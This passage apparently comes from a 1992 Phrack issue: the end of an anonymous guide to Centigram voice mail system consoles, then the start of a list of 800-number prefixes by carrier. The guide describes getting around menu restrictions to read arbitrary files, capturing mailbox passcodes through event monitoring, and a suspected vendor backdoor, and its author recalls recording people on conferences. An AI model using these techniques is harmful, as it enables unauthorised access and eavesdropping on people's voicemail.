|
|
tsk names
|
|
tsk size [p=program] [t=tty] [u=userid]
|
|
tsk ports
|
|
tsk tsk
|
|
tsk tree [+tid] [+all] [-net]
|
|
tsk users [p=program] [t=tty] [u=userid]
|
|
tsk vcs
|
|
tsk who tid ...
|
|
options: +qnx -header +physical [n=]node s=sort_field
|
|
|
|
I haven't seen all the information available from this, yet, as the plain
|
|
"tsk" tells me everything I need to know; however, you may want to play around:
|
|
there's no telling what secrets are hidden...
|
|
|
|
$ tsk tsk
|
|
Tsk tsk? Have I been a bad computer?
|
|
|
|
See what I mean?
|
|
|
|
ddump:
|
|
|
|
The ddump utility is used to display the contents on a specified blocks of
|
|
the disk. It's quite simple to use.
|
|
|
|
$ ddump ?
|
|
use: ddump drive block_number [-v]
|
|
|
|
Again, I'm not quite sure what the -v switch does, but the instructions
|
|
are very straightforward. Normal output looks similar to:
|
|
|
|
$ ddump 3 3
|
|
Place diskette in drive 3 and hit <CR> <-- this message is always
|
|
displayed by ddump.
|
|
Block 00000003 Status: 00
|
|
000: 00 00 00 00 00 00 00 00 94 00 00 00 00 00 00 00 ................
|
|
010: 01 00 01 00 40 02 00 00 00 02 00 00 00 00 00 00 ....@...........
|
|
020: 00 01 00 FF FF 00 00 97 37 29 17 00 01 01 01 30 ........7).....0
|
|
030: C4 17 8E 62 69 74 6D 61 70 00 00 00 00 00 00 00 ...bitmap.......
|
|
040: 00 00 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
050: 00 00 00 FF FF 00 00 A5 37 29 17 00 01 01 17 30 ........7).....0
|
|
060: C4 25 8E 6C 6C 6C 00 00 00 00 00 00 00 00 00 00 .%.lll..........
|
|
070: 00 00 00 00 50 0E 00 00 00 0E 00 00 00 00 00 00 ....P...........
|
|
080: 00 01 00 FF FF 7E 05 A8 38 29 17 00 01 01 17 30 .....~..8).....0
|
|
090: C4 28 8F 61 62 63 00 00 00 00 00 00 00 00 00 00 .(.abc..........
|
|
0A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
0B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
[...etc...]
|
|
|
|
As you can probably notice, what we have here is the directory track for
|
|
the ramdisk. It lists three files, even though the file abc no longer exists.
|
|
The actual bytes have yet to be decoded, but, as far as the ramdisk goes, I
|
|
suspect that they'll be memory related, and not physical block related; that
|
|
is, I suspect that some of the numbers given above correspond to the memory
|
|
address of the file, and not to the actual disk-block. So, at least for the
|
|
ramdisk, finding specific files may be difficult. However, if you only have
|
|
one file on the ramdisk besides "bitmap" (which appears to be mandatory across
|
|
all the disks), then the next file you create should reside on track 4 and
|
|
continue working its way up. Therefore, if you have evmon running and
|
|
redirected to a file on the ramdisk, in order to check the contents, it's not
|
|
necessary to kill the process and restart evmon, etc. Simply "ddump 3 4" and
|
|
you could get either useless information (all the bytes are 00 or FF), or you
|
|
could get something like:
|
|
|
|
$ ddump 3 4
|
|
Place diskette in drive 3 and hit <CR>
|
|
|
|
Block 00000004 Status: 00
|
|
000: 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 ................
|
|
010: 6C 6E 20 20 32 36 20 74 74 20 33 1E 6C 6E 20 20 ln 26 tt 3.ln
|
|
020: 32 36 20 6C 69 6E 65 20 62 72 65 61 6B 1E 6C 6E 26 line break.ln
|
|
030: 20 20 32 36 20 6F 6E 68 6F 6F 6B 1E 6C 6E 20 20 26 onhook.ln
|
|
040: 32 38 20 72 69 6E 67 69 6E 67 1E 6C 6E 20 20 32 28 ringing.ln 2
|
|
050: 38 20 74 74 20 38 1E 6C 6E 20 20 32 38 20 74 74 8 tt 8.ln 28 tt
|
|
060: 20 37 1E 6C 6E 20 20 32 38 20 74 74 20 36 1E 6C 7.ln 28 tt 6.l
|
|
070: 6E 20 20 32 38 20 74 74 20 32 1E 6C 6E 20 20 32 n 28 tt 2.ln 2
|
|
080: 38 20 6F 66 66 68 6F 6F 6B 1E 6C 6E 20 20 32 38 8 offhook.ln 28
|
|
090: 20 74 74 20 2A 1E 6C 6E 20 20 32 38 20 74 74 20 tt *.ln 28 tt
|
|
|
|
And so forth, thus making sure that the file does have some content.
|
|
Depending upon the length of that content, you could then choose to either keep
|
|
the file running, or restart evmon and buffer the previous output.
|
|
|
|
led:
|
|
|
|
The program "led" is Centigram's answer to a standard text editor. It is
|
|
equivalent to "ed" in Unix or "edlin" in MS-DOS, but it does have its minor
|
|
differences. "led" is used to create text files, edit existing log files, or
|
|
edit executable shell scripts. By typing "led [filename]", you will enter the
|
|
led editor, and if a filename is specified, and it exists, the file will be
|
|
loaded and the editor set to line 1. If there is no filename on the command
|
|
line, the file does not exist, or the file is busy, then led begins editing a
|
|
null file, an empty buffer, without the corresponding filename.
|
|
|
|
Commands can also be specified to be used in led after the filename is
|
|
entered. If needed, you can experiment with this.
|
|
|
|
Notable commands from within led:
|
|
|
|
i insert
|
|
a append
|
|
w [filename] write to disk; if no file is named, attempt to
|
|
write to current file; if there is no current
|
|
file, do not write.
|
|
d delete current line
|
|
a number goto line numbered
|
|
q quit (if not saved, inform user to use "qq")
|
|
qq really quit
|
|
|
|
When inserting or appending, led will prompt you with a "." period. To
|
|
end your entry, simply enter one period alone on a line and you will then
|
|
return to command mode. When displaying the current entry, led will prefix all
|
|
new, updated lines, with the "i" character.
|
|
|
|
The key sequence to enter a DobbsHead into a file and redirect it to the
|
|
console, then, would be:
|
|
|
|
$ led 3:/dobbshead
|
|
3:/dobbshead : unable to match file
|
|
i
|
|
. ___
|
|
. . / \
|
|
. . | o o |
|
|
. . | Y |
|
|
. U===== |
|
|
. \___/
|
|
. FUCK YOU!
|
|
q
|
|
?4 buffer has been modified, use qq to quit without saving
|
|
w 3:/dobbshead
|
|
7 [the number of lines in the file]
|
|
q
|
|
$ p 3:/dobbshead > $cons
|
|
$ rm 3:/dobbshead
|
|
|
|
Ok, so it's not quite the DobbsHead. Fuck you.
|
|
|
|
The console utility:
|
|
|
|
The program that acts as the menu driver for the Voice Mail System
|
|
Administration, the program that is normally run upon correct passcode entry,
|
|
is /cmds/console. This program will simply produce a menu with a variety of
|
|
sub-menus that allow the administrator to perform a wide assortment of tasks.
|
|
Since this is mostly self-explanatory, I'll let you find out about these
|
|
functions for yourself; I will, however, add just a few comments about the
|
|
console utility. The first menu received should look like this:
|
|
|
|
(c) All Software Copyright 1983, 1989 Centigram Corporation
|
|
All Rights Reserved.
|
|
|
|
MAIN MENU
|
|
|
|
(M) Mailbox maintenance
|
|
(R) Report generation
|
|
(S) System maintenance
|
|
(X) Exit
|
|
|
|
Enter letter in () to execute command.
|
|
When you need help later, type ?.
|
|
|
|
COMMAND (M/R/S/X):
|
|
|
|
The mailbox maintenance option is used when you want to find specific
|
|
information concerning mailboxes on the system. For instance, to get a listing
|
|
of all the mailboxes currently being used on the system:
|
|
|
|
COMMAND (M/R/S/X): m
|
|
|
|
MAILBOX MAINTENANCE
|
|
|
|
(B) Mailbox block inquiry
|
|
(C) Create new mailboxes
|
|
(D) Delete mailboxes
|
|
(E) Mailbox dump
|
|
(I) Inquire about mailboxes
|
|
(L) List maintenance
|
|
(M) Modify mailboxes
|
|
(P) Set passcode/tutorial
|
|
(R) Rotational mailboxes
|
|
(S) Search for mailboxes
|
|
(X) Exit
|
|
|
|
If you need help later, type ?.
|
|
|
|
COMMAND (B/C/D/E/I/L/M/P/R/S/X): i
|
|
Report destination (c/s1/s2) [c]:
|
|
|
|
Mailbox to display: 0000-9999
|
|
|
|
>>> BOBTEL <<<
|
|
Mailbox Data Inquiry
|
|
Tue Mar 31, 1992 3:07 am
|
|
|
|
Box Msgs Unp Urg Rec Mins FCOS LCOS GCOS NCOS MWI Passwd
|
|
8001 1 1 0 0 0.0 5 5 1 1 None Y
|
|
8002 0 0 0 0 0.0 5 5 1 1 None Y (t)
|
|
8003 0 0 0 0 0.0 12 12 1 1 None Y
|
|
8005 0 0 0 0 0.0 12 12 1 1 None Y
|
|
8006 6 6 0 0 0.7 12 12 1 1 None N
|
|
8008 0 0 0 0 0.0 5 5 1 1 None Y
|
|
8013 0 0 0 0 0.0 12 12 1 1 None 1234
|
|
8014 0 0 0 0 0.0 5 5 1 1 None Y
|
|
8016 0 0 0 0 0.0 12 12 1 1 None Y
|
|
[ ... etc ... ]
|
|
|
|
This simply lists every box along with the relevant information concerning
|
|
that box. Msgs, Unp, Urg, Rec are the Total number of messages, number of
|
|
unplayed messages, number of urgent messages, and number of received messages
|
|
currently being stored on the drive for the mailbox; Mins is the numbers of
|
|
minutes currently being used by those messages; F, L, G, and NCOS are various
|
|
classes of service for the mailboxes; MWI is the message waiting indicator, or
|
|
service light; and Passwd is simply a Yes/No condition informing the
|
|
administrator whether the mailbox currently has a password. The "(t)" in the
|
|
password field means the box is currently in tutorial mode, and the "1234" that
|
|
replaces the Y/N condition, which means the box is set to initial tutorial mode
|
|
with simple passcode 1234 -- in other words the box is available to be used by
|
|
a new subscriber. Mailboxes with FCOS of 1 should be looked for: these
|
|
represent administration or service mailboxes, although they are not
|
|
necessarily capable of performing system administration functions.
|
|
|
|
The System Maintenance option from the main menu is very useful in that,
|
|
if you don't have access to the qnxsh, you can still run a number of tasks or
|
|
print out any file you wish from within the menu system. The System
|
|
Maintenance menu looks like:
|
|
|
|
SYSTEM MAINTENANCE
|
|
|
|
(A) Automatic Wakeup
|
|
(B) Automated Receptionist Extensions
|
|
(D) Display modem passcode
|
|
(E) Enable modem/serial port
|
|
(F) Floppy backup
|
|
(G) Resynchronize HIS PMS room status
|
|
(H) Hard Disk Utilities
|
|
(L) Lights test
|
|
(M) Manual message purge
|
|
(N) System name
|
|
(P) Passcode
|
|
(R) Reconfiguration
|
|
(S) System shutdown
|
|
(T) Time and date
|
|
(U) Utility menu
|
|
(V) Call Detail Recorder
|
|
(W) Network menu
|
|
(X) Exit
|
|
|
|
Enter letter in () to execute command.
|
|
When you need help later, type ?.
|
|
|
|
COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X):
|
|
|
|
If you don't have access to the "p" command, you can still display any
|
|
specific file on the drive that you wish to see. Choose "v," the Call Detail
|
|
Recorder option from above, and you will get this menu:
|
|
|
|
COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): v
|
|
Warning: cdr is not running.
|
|
|
|
CALL DETAIL RECORDER MENU
|
|
|
|
(C) Configure CDR
|
|
(R) Run CDR
|
|
(T) Terminate CDR
|
|
(E) Run EVMON
|
|
(F) Terminate EVMON
|
|
(S) Show CDR log file
|
|
(D) Delete CDR log file
|
|
(X) Exit
|
|
|
|
If you need help later, type ?.
|
|
|
|
COMMAND (C/R/T/E/F/S/D/X):
|
|
|
|
From here, you can use (C) Configure CDR to set the log file to any name
|
|
that you want, and use (S) to print that file to your terminal.
|
|
|
|
COMMAND (C/R/T/E/F/S/D/X): c
|
|
|
|
Answer the following question to configure call detail recorder
|
|
[ simply hit return until the last "filename" question come up ]
|
|
VoiceMemo line numbers enabled:
|
|
HOST 1 lines:
|
|
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
|
|
16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
|
|
VoiceMemo line numbers:
|
|
|
|
EVMON: HOST 1 lines to monitor:
|
|
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
|
|
16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
|
|
EVMON:VoiceMemo line numbers:
|
|
Message levels are:
|
|
1: Detailed VoiceMemo
|
|
2: VoiceMemo
|
|
3: Pager
|
|
4: Receptionist
|
|
5: EVMON
|
|
6: Automatic WakeUp
|
|
7: Open Account Administrator
|
|
8: DTMF to PBX
|
|
9: Message Waiting Lamp
|
|
10: SL-1 integration
|
|
11: Centrex Integration
|
|
Message levels enabled:
|
|
2 3 7 9
|
|
Message levels:
|
|
cdr enable = [N]
|
|
Enter filename to save log data = [/logfile] /config/remote.cmds
|
|
|
|
Returning from the CDR configuration.
|
|
|
|
CALL DETAIL RECORDER MENU
|
|
|
|
(C) Configure CDR
|
|
(R) Run CDR
|
|
(T) Terminate CDR
|
|
(E) Run EVMON
|
|
(F) Terminate EVMON
|
|
(S) Show CDR log file
|
|
(D) Delete CDR log file
|
|
(X) Exit
|
|
|
|
If you need help later, type ?.
|
|
|
|
COMMAND (C/R/T/E/F/S/D/X): s
|
|
ad
|
|
cd
|
|
copy
|
|
date
|
|
dskchk
|
|
evmon
|
|
files
|
|
ls
|
|
mount
|
|
p
|
|
pwd
|
|
query
|
|
task
|
|
tcap
|
|
what
|
|
|
|
Don't forget to return the filename back to its original name as shown in
|
|
the [] field after you have finished.
|
|
|
|
If you don't have access to the shell, you can also run EVMON, from the
|
|
CDR menu, using option E. It will simply start the evmon process displaying to
|
|
your terminal, interruptable by the break character, ^C. This, unfortunately,
|
|
cannot be redirected or run in the background as tasks running from the shell
|
|
can. If, however, you have some time to kill, you may want to play with it.
|
|
|
|
Also, from the System Maintenance menu, you can perform a number of shell
|
|
tasks without direct access to the shell. Option (U), Utilities Menu, has an
|
|
option called Task. This will allow you limited shell access, possibly with
|
|
redirection and "&" back-grounding.
|
|
|
|
COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): U
|
|
|
|
UTILITY MENU
|
|
|
|
(B) Reboot
|
|
(H) History
|
|
(T) Task
|
|
(X) Exit
|
|
|
|
Enter letter in () to execute command.
|
|
When you need help later, type ?.
|
|
|
|
COMMAND (B/H/T/X): t
|
|
|
|
Choose the following commands:
|
|
ad cd copy date
|
|
dskchk evmon files ls
|
|
mount p pwd query
|
|
task tcap what
|
|
|
|
Enter a command name or "X" to exit: pwd
|
|
1:/
|
|
|
|
Choose the following commands:
|
|
ad cd copy date
|
|
dskchk evmon files ls
|
|
mount p pwd query
|
|
task tcap what
|
|
|
|
Enter a command name or "X" to exit: evmon
|
|
Type Ctrl-C to terminate.
|
|
ln 29 ringing
|
|
ln 29 tt 8
|
|
ln 29 tt 0
|
|
ln 29 tt 8
|
|
ln 29 tt 6
|
|
ln 29 offhook
|
|
ln 29 record ended
|
|
[ ... etc ... ]
|
|
|
|
A look at "ad":
|
|
|
|
The program "ad" is called to dump information on a variety of things, the
|
|
most useful being mailboxes. Dumps of specific information about a mailbox can
|
|
be done either in Mailbox format, or Raw Dump format. Mailbox format looks
|
|
like:
|
|
|
|
$ ad
|
|
Type #: 0
|
|
Mailbox #: 8486
|
|
(M)ailbox, (D)ump ? m
|
|
|
|
MAILBOX: 8486
|
|
|
|
Login status:
|
|
Bad logs = 3 Last log = 03/26/92 12:19 pmVersion = 0
|
|
|
|
Configuration:
|
|
Name # = 207314 Greeting = 207309 Greeting2 = 0
|
|
Passcode = XXXXXXXXXX Tutorial = N Extension = 8486
|
|
Ext index = 0 Attendant = Attend index = 0
|
|
Code = ID = BOBTECH
|
|
Day_treat = M Night_treat = M Fcos = 12
|
|
Lcos = 12 Gcos = 1 Ncos = 1
|
|
Rot index = 0 Rot period = 0
|
|
Rot start = --
|
|
wkup defined = N wkup freq = 0 wkup_intvl = 0
|
|
wkup index = 0 wkup number =
|
|
|
|
Contents:
|
|
Motd_seq = 8 Motd_played = N User_msgs = 0
|
|
Caller_msgs = 4 Sent_cpx_msgs= 0 Sent_fdx_msgs= 0
|
|
Sent_urg_msgs= 0 Tas_msgs = 0 Pages = 0
|
|
Receipt = 0 Sent_to_node = 0 Urg_to_node = 0
|
|
Net_urg_mlen = 0 Net_msgs_rcv = 0 Net_urg_rcv = 0
|
|
Net_sent_node= 0 Net_send_nurg= 0 Net_send_rcp = 0
|
|
Greet_count = 9 Successlogins= 1 Recpt_calls = 0
|
|
Recpt_complt = 0 Recpt_busy = 0 Recpt_rna = 0
|
|
Recpt_msgs = 0 Recpt_attend = 0 User_connect = 20
|
|
Clr_connect = 22 Callp_connect= 0 Disk_use = 498
|
|
Net_sent_mlen= 0 Net_rcvd_mlen= 0 Net_rcvd_urg = 0
|
|
Net_node_mlen= 0 Net_recip_mlen=0 Net_node_urg = 0
|
|
Text_msg_cnt = 0
|
|
|
|
|
|
Message Queues:
|
|
TYPE COUNT TOTAL HEAD TAIL TYPE COUNT TOTAL HEAD TAIL
|
|
Free 71 --- 58 55 Unplayed 0 --- -1 -1
|
|
Played 2 0.5 56 57 Urgent 0 --- -1 -1
|
|
Receipts 0 --- -1 -1 Undelivered 0 --- -1 -1
|
|
Future delivery 0 --- -1 -1 Call placement 0 --- -1 -1
|
|
|
|
Messages: 2
|
|
# msg # DATE TIME LENGTH SENDER PORT FLAGS MSG SIBL
|
|
(MINS) NXT PRV NXT PRV
|
|
Played Queue
|
|
56 207126 03/26/92 12:17 pm 0.5 000000000000000 27 ------P- 57 -1 -1 -1
|
|
|
|
57 207147 03/26/92 12:19 pm 0.1 000000000000000 29 ------P- -1 56 -1 -1
|
|
|
|
The Raw Dump format looks like:
|
|
$ ad
|
|
Type #: 0
|
|
Mailbox #: 8487
|
|
(M)ailbox, (D)ump ? d
|
|
|
|
HEX: 8487
|
|
000: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 34 38 |..............48|
|
|
030: 37 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |7...............|
|
|
040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
050: 00 00 00 00 00 00 00 00 - 00 00 42 49 4f 54 45 43 |..........BOBTEC|
|
|
060: 48 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |H...............|
|
|
070: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
080: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 37 32 33 |.............723|
|
|
090: 36 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |6...............|
|
|
0a0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
0b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
0c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
|
|
[mostly deleted -- the list continues to hex fff.]
|
|
|
|
One of the unfortunate aspects is that the password is not displayed in
|
|
the Mailbox format (Awwww!). I can tell you now, though, that it also isn't
|
|
displayed anywhere in the Raw Dump format. The program "asetpass" was used to
|
|
change the password of a test mailbox, and both full dumps were downloaded and
|
|
compared; they matched exactly. So, it looks like the passcodes are probably
|
|
stored somewhere else, and the dump simply contains a link to the appropriate
|
|
offset; which means the only way, so far, to get passcodes for mailboxes is to
|
|
capture them in EVMON.
|
|
|
|
Intricacies of the login program:
|
|
|
|
The console login program is 1:/cmds/login. Although I can't even
|
|
recognize any valid 8080 series assembly in the program (and I'm told the
|
|
Centigram boxes run on the 8080 family), I did manage to find a few interesting
|
|
tidbits inside of it. First, the console and remote passwords seems to be
|
|
stored in the file /config/rates; unfortunately, it's encrypted and I'm not
|
|
going to try to break the scheme. /config/rates looks like this:
|
|
|
|
$ p /config/rates
|
|
\CE\FFC~C~\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00
|
|
\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\00\00\00\00\00\00\00
|
|
\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
|
|
|
|
Accepting the \CE as some sort of control byte, this file is divided up
|
|
into about eight empty sections of five bytes a piece, mostly null, indicating
|
|
that, possibly, there are a number of acceptable passcode combinations, or a
|
|
number of different functions with different passcodes. In this instance, only
|
|
one passcode appears to be selected. I am still unsure, however, whether this
|
|
is actually a password file, or a file that would act as a pointer to another
|
|
space on the disk which contains the actual password. I would assume, for this
|
|
login program, that it is actually an encrypted password.
|
|
|
|
Another very interesting thing sleeping within the confines of the login
|
|
program is the inconspicuous string "QNX." It sits in the code between two
|
|
"Enter Passcode:" prompts, separated by \00s. I believe this to be a system
|
|
wide backdoor placed into the login program by Centigram, Corp. Such a thing
|
|
does exist; whenever Centigram wants to get into a certain mailbox system to
|
|
perform maintenance or solve a problem, they can. They may, however, require
|
|
the serial number of the machine or of the hard drive, in order to get this
|
|
access. This serial number would be provided by the company requiring service.
|
|
|
|
When logging in with QNX, a very strange thing happens.
|
|
|
|
(^Z)
|
|
Enter Passcode: (QNX^M) Enter Passcode:
|
|
|
|
A second passcode prompt appears, a prompt in which the "QNX" passcode
|
|
produces an Invalid Passcode message. I believe that when Centigram logs in
|
|
from remote, they use this procedure, along with either a predetermined
|
|
passcode, or a passcode determined based on a serial number, to access the
|
|
system. I have not ever seen this procedure actually done, but it is the best
|
|
speculation that I can give.
|
|
|
|
I should also make note of a somewhat less important point. Should the
|
|
console have no passcodes assigned, a simple ^Z for terminal activation will
|
|
start the /cmds/console program, and log the user directly in without prompting
|
|
for a passcode. The odds on finding a Centigram like this, nowadays, is
|
|
probably as remote as being struck by lightning, but personally, I can recall a
|
|
time a number of years back when a Florida company hadn't yet passcode
|
|
protected a Centigram. It was very fun to have such a large number of people
|
|
communicating back and forth in normal voice; it was even more fun to hop on
|
|
conferences with a number of people and record the stupidity of the average
|
|
Bell operator.
|
|
|
|
Special Keys or Strings:
|
|
|
|
There are a number of special characters or strings that are important to
|
|
either the shell or the program being executed. Some of these are:
|
|
|
|
? after the program name, gives help list for that program.
|
|
& runs a task in the background
|
|
: sets the comment field (for text within shell scripts)
|
|
; command delimiter within the shell
|
|
> redirects output of a task to a file
|
|
< (theoretically) routes input from a file
|
|
$cons the "filename" of the console (redirectable)
|
|
$tty# the "filename" of tty number "#"
|
|
$mdm the "filename" of the modem line
|
|
#$ ? produces a value like "1920", "321d"
|
|
probably the TID of the current process
|
|
## ? produces a value like "ffff"
|
|
#% ? produces a value like "0020", "001d"
|
|
#& ? produces a value like "0000"
|
|
#? ? produces a value like "0000"
|
|
#* a null argument
|
|
#g ? produces a value like "00ff"
|
|
#i directly followed by a number, produces "0000"
|
|
not followed, produces the error "non-existent integer variable" probably
|
|
used in conjunction with environment variables
|
|
#k accepts a line from current input (stdin) to be
|
|
substituted on the command line
|
|
#m ? "00ff"
|
|
#n ? "0000"
|
|
#p ? "0042"
|
|
#s produces the error "non-existent string variable" probably used in
|
|
conjunction with environment variables
|
|
#t ? "0003"
|
|
#u ? some string similar to "system"
|
|
#D ? "0018"
|
|
#M ? "0004"
|
|
#Y ? "005c"
|
|
|
|
"Centigram Voice Mail System Consoles" was written anonymously. There are no
|
|
group affiliations tied to this file.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 7 of 13
|
|
|
|
/^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
|
|
/^\ /^\
|
|
/^\ Special Area Codes II /^\
|
|
/^\ /^\
|
|
/^\ by Bill Huttig /^\
|
|
/^\ wah@ZACH.FIT.EDU /^\
|
|
/^\ /^\
|
|
/^\ February 24, 1992 /^\
|
|
/^\ /^\
|
|
/^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
|
|
|
|
|
|
The first "Special Area Codes" file appeared in Phrack Issue 24, but here
|
|
is an updated listing of the prefixes used with 800 toll free service. This
|
|
list shows which carrier handles calls placed to 800-XXX numbers. Choice of
|
|
carrier routing on calls to 800-xxx numbers cannot be overridden with 10xxx
|
|
routing. It should also be noted that on calls to 800 numbers, the called
|
|
party either immediatly in some instances or on a delayed basis receives a
|
|
record of numbers which called. This identification of the calling party
|
|
cannot be overridden with *67 or the "line-blocking" associated with Caller-ID.
|
|
|
|
|
|
202 RCCP RADIO COMMON CARRIER PAGING
|
|
212 RCCP RADIO COMMON CARRIER PAGING
|
|
213 9348 CINCINNATI BELL TELEPHONE
|
|
220 ATZ ATX-COMMUNICATIONS
|
|
221 ATX AT&T-C
|
|
222 ATX AT&T-C
|
|
223 ATX AT&T-C
|
|
224 LDL LONG DISTANCE FOR LESS
|
|
225 ATX AT&T-C
|
|
226 ATL ATC
|
|
227 ATX AT&T-C
|
|
228 ATX AT&T-C
|
|
229 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
230 NTK NETWORK TELEMANAGEMENT SERVICES
|
|
231 ATX AT&T-C
|
|
232 ATX AT&T-C
|
|
233 ATX AT&T-C
|
|
234 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
235 ATX AT&T-C
|
|
236 SCH SCHNEIDER COMMUNICATIONS
|
|
237 ATX AT&T-C
|
|
238 ATX AT&T-C
|
|
239 DLT DELTA COMMUNICATIONS, INC.
|
|
240 SIR SOUTHERN INTEREXCHANGE SERVICES
|
|
241 ATX AT&T-C
|
|
242 ATX AT&T-C
|
|
243 ATX AT&T-C
|
|
244 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
245 ATX AT&T-C
|
|
246 9553 SOUTHWESTERN BELL
|
|
247 ATX AT&T-C
|
|
248 ATX AT&T-C
|
|
249 LWC LASSMAN-WEBER COMMUNICATIONS
|
|
251 ATX AT&T-C
|
|
252 ATX AT&T-C
|
|
253 ATX AT&T-C
|
|
254 TTU TOTAL-TEL USA
|
|
255 ATX AT&T-C
|
|
256 LSI LONG DISTANCE SAVERS
|
|
257 ATX AT&T-C
|
|
258 ATX AT&T-C
|
|
259 LSI LONG DISTANCE SAVERS
|
|
260 COK COM-LINK21
|
|
261 SCH SCHNEIDER COMMUNICATIONS
|
|
262 ATX AT&T-C
|
|
263 CAN TELCOM CANADA
|
|
264 LDD LDDS COMMUNICATIONS
|
|
265 CAN TELCOM CANADA
|
|
266 CSY COM SYSTEMS
|
|
267 CAN TELCOM CANADA
|
|
268 CAN TELCOM CANADA
|
|
269 FDG FIRST DIGITAL NETWORK
|
|
270 CRZ CLEARTEL COMMUNICATIONS
|
|
271 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
|
|
272 ATX AT&T-C
|
|
273 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
274 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
275 ITT MTD/UNITED STATES TRANSMISSION SYSTEMS
|
|
276 ONE ONE CALL COMMUNICATIONS, INC.
|
|
277 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
279 MAL MIDAMERICAN
|
|
280 ADG ADVANTAGE NETWORK, INC.
|
|
282 ATX AT&T-C
|
|
283 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
284 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
286 9147 SOUTHERN NEW ENGLAND TELEPHONE
|
|
287 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
288 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
289 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
292 ATX AT&T-C
|
|
293 PRO PROTO-COL
|
|
294 FDC AFFORD A CALL
|
|
295 ACT ACC LONG DISTANCE CORPORATION
|
|
296 LDW LONG DISTANCE SERVICE, INC.
|
|
297 ARE AMERICAN EXPRESS TRS
|
|
298 CNO COMTEL OF NEW ORLEANS
|
|
299 ATL ATC
|
|
302 RCCP RADIO COMMON CARRIER PAGING
|
|
312 RCCP RADIO COMMON CARRIER PAGING
|
|
320 CQD CONQUEST LONG DISTANCE CORPORATION
|
|
321 ATX AT&T-C
|
|
322 ATX AT&T-C
|
|
323 ATX AT&T-C
|
|
324 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC.
|
|
325 ATX AT&T-C
|
|
326 UTC US TELCOM, INC./US SPRINT
|
|
327 ATX AT&T-C
|
|
328 ATX AT&T-C
|
|
329 ATL ATC
|
|
330 ATL ATC
|
|
331 ATX AT&T-C
|
|
332 ATX AT&T-C
|
|
333 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
334 ATX AT&T-C
|
|
335 SCH SCHNEIDER COMMUNICATIONS
|
|
336 ATX AT&T-C
|
|
337 FDR FIRST DATA RESOURCES
|
|
338 ATX AT&T-C
|
|
339 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
340 FFM FIRST FINANCIAL MANAGEMENT CORPORATION
|
|
341 ATX AT&T-C
|
|
342 ATX AT&T-C
|
|
343 ATX AT&T-C
|
|
344 ATX AT&T-C
|
|
345 ATX AT&T-C
|
|
346 ATX AT&T-C
|
|
347 UTC US TELCOM, INC./US SPRINT
|
|
348 ATX AT&T-C
|
|
349 DCT DIRECT COMMUNICATIONS, INC.
|
|
350 CSY COM SYSTEMS
|
|
351 ATX AT&T-C
|
|
352 ATX AT&T-C
|
|
353 SCH SCHNEIDER COMMUNICATIONS
|
|
354 ATX AT&T-C
|
|
355 ATZ ATX-COMMUNICATIONS
|
|
356 ATX AT&T-C
|
|
357 CNZ CAM-NET SYSTEMS-INC.
|
|
358 ATX AT&T-C
|
|
359 UTC US TELCOM, INC./US SPRINT
|
|
360 CWV ?
|
|
361 CAN TELCOM CANADA
|
|
362 ATX AT&T-C
|
|
363 CAN TELCOM CANADA
|
|
364 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC.
|
|
365 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
366 UTC US TELCOM, INC./US SPRINT
|
|
367 ATX AT&T-C
|
|
368 ATX AT&T-C
|
|
369 TDD MCI / TELECONNECT
|
|
370 TDD MCI / TELECONNECT
|
|
372 ATX AT&T-C
|
|
373 TDD MCI / TELECONNECT
|
|
374 ITG INTERNATIONAL TELECHARGE, INC.
|
|
375 TNO ATC CIGNAL COMMUNICATIONS
|
